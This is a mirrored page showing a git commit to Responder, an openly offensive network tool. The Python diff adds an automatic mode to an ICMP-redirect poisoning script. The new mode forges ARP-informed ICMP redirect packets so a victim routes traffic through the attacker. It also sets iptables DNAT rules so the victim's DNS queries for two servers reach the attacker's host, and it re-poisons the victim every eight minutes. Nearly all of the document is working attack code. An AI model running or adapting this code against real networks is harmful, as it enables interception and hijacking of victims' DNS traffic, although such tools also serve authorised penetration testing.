mirror of
https://github.com/lgandx/Responder.git
synced 2025-07-14 09:02:54 -07:00
added automatic poisoning mode when a primary and a secondary DNS is specified.
This commit is contained in:
Lgandx
parent
4112b1cd5d
commit
ccbbbe3453
1 changed files with 34 additions and 7 deletions
|
|
@ -15,10 +15,13 @@
|
||||||
#
|
#
|
||||||
# You should have received a copy of the GNU General Public License
|
# You should have received a copy of the GNU General Public License
|
||||||
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
import sys,socket,struct,optparse,random
|
import sys,socket,struct,optparse,random,pipes
|
||||||
from socket import *
|
from socket import *
|
||||||
from odict import OrderedDict
|
from odict import OrderedDict
|
||||||
from random import randrange
|
from random import randrange
|
||||||
|
from time import sleep
|
||||||
|
from subprocess import call
|
||||||
|
from pipes import quote
|
||||||
|
|
||||||
parser = optparse.OptionParser(usage='python %prog -I eth0 -i 10.20.30.40 -g 10.20.30.254 -t 10.20.30.48 -r 10.20.40.1',
|
parser = optparse.OptionParser(usage='python %prog -I eth0 -i 10.20.30.40 -g 10.20.30.254 -t 10.20.30.48 -r 10.20.40.1',
|
||||||
prog=sys.argv[0],
|
prog=sys.argv[0],
|
||||||
|
|
@ -31,6 +34,8 @@ parser.add_option('-t', '--target',action="store", help="The ip address of the t
|
||||||
|
|
||||||
parser.add_option('-r', '--route',action="store", help="The ip address of the destination target, example: DNS server. Must be on another subnet.", metavar="10.20.40.1",dest="ToThisHost")
|
parser.add_option('-r', '--route',action="store", help="The ip address of the destination target, example: DNS server. Must be on another subnet.", metavar="10.20.40.1",dest="ToThisHost")
|
||||||
|
|
||||||
|
parser.add_option('-s', '--secondaryroute',action="store", help="The ip address of the destination target, example: Secondary DNS server. Must be on another subnet.", metavar="10.20.40.1",dest="ToThisHost2")
|
||||||
|
|
||||||
parser.add_option('-I', '--interface',action="store", help="Interface name to use, example: eth0", metavar="eth0",dest="Interface")
|
parser.add_option('-I', '--interface',action="store", help="Interface name to use, example: eth0", metavar="eth0",dest="Interface")
|
||||||
|
|
||||||
parser.add_option('-a', '--alternate',action="store", help="The alternate gateway, set this option if you wish to redirect the victim traffic to another host than yours", metavar="10.20.30.40",dest="AlternateGwAddr")
|
parser.add_option('-a', '--alternate',action="store", help="The alternate gateway, set this option if you wish to redirect the victim traffic to another host than yours", metavar="10.20.30.40",dest="AlternateGwAddr")
|
||||||
|
|
@ -71,6 +76,7 @@ OriginalGwAddr = options.OriginalGwAddr
|
||||||
AlternateGwAddr = options.AlternateGwAddr
|
AlternateGwAddr = options.AlternateGwAddr
|
||||||
VictimIP = options.VictimIP
|
VictimIP = options.VictimIP
|
||||||
ToThisHost = options.ToThisHost
|
ToThisHost = options.ToThisHost
|
||||||
|
ToThisHost2 = options.ToThisHost2
|
||||||
Interface = options.Interface
|
Interface = options.Interface
|
||||||
|
|
||||||
def Show_Help(ExtraHelpData):
|
def Show_Help(ExtraHelpData):
|
||||||
|
|
@ -80,8 +86,6 @@ def Show_Help(ExtraHelpData):
|
||||||
|
|
||||||
MoreHelp = "Note that if the target is Windows, the poisoning will only last for 10mn, you can re-poison the target by launching this utility again\nIf you wish to respond to the traffic, for example DNS queries your target issues, launch this command as root:\n\niptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst %s --dport 53 -j DNAT --to-destination %s:53\n\n"%(ToThisHost,OURIP)
|
MoreHelp = "Note that if the target is Windows, the poisoning will only last for 10mn, you can re-poison the target by launching this utility again\nIf you wish to respond to the traffic, for example DNS queries your target issues, launch this command as root:\n\niptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst %s --dport 53 -j DNAT --to-destination %s:53\n\n"%(ToThisHost,OURIP)
|
||||||
|
|
||||||
Show_Help(MoreHelp)
|
|
||||||
|
|
||||||
class Packet():
|
class Packet():
|
||||||
fields = OrderedDict([
|
fields = OrderedDict([
|
||||||
("data", ""),
|
("data", ""),
|
||||||
|
|
@ -218,7 +222,7 @@ def ReceiveArpFrame(DstAddr):
|
||||||
print "[ARP]%s took too long to Respond. Please provide a valid host.\n"%(DstAddr)
|
print "[ARP]%s took too long to Respond. Please provide a valid host.\n"%(DstAddr)
|
||||||
exit(1)
|
exit(1)
|
||||||
|
|
||||||
def IcmpRedirectSock():
|
def IcmpRedirectSock(DestinationIP):
|
||||||
PrintMac,DestMac = ReceiveArpFrame(VictimIP)
|
PrintMac,DestMac = ReceiveArpFrame(VictimIP)
|
||||||
print '[ARP]Target Mac address is :',PrintMac
|
print '[ARP]Target Mac address is :',PrintMac
|
||||||
PrintMac,RouterMac = ReceiveArpFrame(OriginalGwAddr)
|
PrintMac,RouterMac = ReceiveArpFrame(OriginalGwAddr)
|
||||||
|
|
@ -227,7 +231,7 @@ def IcmpRedirectSock():
|
||||||
Protocol = 0x0800
|
Protocol = 0x0800
|
||||||
s.bind((Interface, Protocol))
|
s.bind((Interface, Protocol))
|
||||||
Eth = Eth2(DstMac=DestMac,SrcMac=RouterMac)
|
Eth = Eth2(DstMac=DestMac,SrcMac=RouterMac)
|
||||||
IPPackUDP = IPPacket(Cmd="\x11",SrcIP=VictimIP,DestIP=ToThisHost,TTL="\x40",Data=str(DummyUDP()))
|
IPPackUDP = IPPacket(Cmd="\x11",SrcIP=VictimIP,DestIP=DestinationIP,TTL="\x40",Data=str(DummyUDP()))
|
||||||
IPPackUDP.calculate()
|
IPPackUDP.calculate()
|
||||||
ICMPPack = ICMPRedir(GwAddr=AlternateGwAddr,Data=str(IPPackUDP))
|
ICMPPack = ICMPRedir(GwAddr=AlternateGwAddr,Data=str(IPPackUDP))
|
||||||
ICMPPack.calculate()
|
ICMPPack.calculate()
|
||||||
|
|
@ -235,6 +239,29 @@ def IcmpRedirectSock():
|
||||||
IPPack.calculate()
|
IPPack.calculate()
|
||||||
final = str(Eth)+str(IPPack)
|
final = str(Eth)+str(IPPack)
|
||||||
s.send(final)
|
s.send(final)
|
||||||
print '\n[ICMP]%s should have been poisoned with a new route for target: %s.\n'%(VictimIP,ToThisHost)
|
print '\n[ICMP]%s should have been poisoned with a new route for target: %s.\n'%(VictimIP,DestinationIP)
|
||||||
|
|
||||||
|
def FindWhatToDo(ToThisHost2):
|
||||||
|
if ToThisHost2 != None:
|
||||||
|
Show_Help('Hit CRTL-C to kill this script')
|
||||||
|
RunThisInLoop(ToThisHost, ToThisHost2,OURIP)
|
||||||
|
if ToThisHost2 == None:
|
||||||
|
Show_Help(MoreHelp)
|
||||||
|
IcmpRedirectSock(DestinationIP=ToThisHost)
|
||||||
|
exit()
|
||||||
|
|
||||||
|
def RunThisInLoop(host, host2, ip):
|
||||||
|
dns1 = pipes.quote(host)
|
||||||
|
dns2 = pipes.quote(host2)
|
||||||
|
ouripadd = pipes.quote(ip)
|
||||||
|
call("iptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst "+dns1+" --dport 53 -j DNAT --to-destination "+ouripadd+":53", shell=True)
|
||||||
|
call("iptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst "+dns2+" --dport 53 -j DNAT --to-destination "+ouripadd+":53", shell=True)
|
||||||
|
print "[+]Automatic mode enabled\nAn iptable rules has been added for both DNS servers."
|
||||||
|
while True:
|
||||||
|
IcmpRedirectSock(DestinationIP=dns1)
|
||||||
|
IcmpRedirectSock(DestinationIP=dns2)
|
||||||
|
print "[+]Repoisoning the target in 8 minutes..."
|
||||||
|
sleep(480)
|
||||||
|
|
||||||
|
FindWhatToDo(ToThisHost2)
|
||||||
|
|
||||||
IcmpRedirectSock()
|
|
||||||
|
|
|
||||||
Loading…
Add table
Add a link
Reference in a new issue